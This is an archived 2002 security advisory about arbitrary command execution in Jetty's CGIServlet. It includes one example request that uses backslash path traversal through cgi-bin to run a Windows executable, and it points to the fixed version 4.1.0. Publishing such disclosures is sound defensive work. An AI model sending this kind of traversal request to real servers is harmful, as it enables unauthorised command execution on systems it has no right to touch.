TUCoPS :: Web :: Apps :: web5730.htm

Jetty CGIServlet Arbitrary Command Execution
3rd Oct 2002 [SBWID-5730]
COMMAND

	Jetty CGIServlet Arbitrary Command Execution

SYSTEMS AFFECTED

	Jetty Servlet Container
	

	

PROBLEM

	In Matt Moore [matt@westpoint.ltd.uk] advisory [ID#:wp-02-0011] :
	

	Commands can be executed on the server by making requests like:
	

	http://jetty-server:8080/cgi-bin/..\..\..\..\..\..\winnt/notepad.exe

	

SOLUTION

	The vendor responded quickly and has released  a  fixed  version,  4.1.0
	which can be downloaded from http://jetty.mortbay.org
	

	This advisory is available online at:
	

	http://www.westpoint.ltd.uk/advisories/wp-02-0011.txt

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH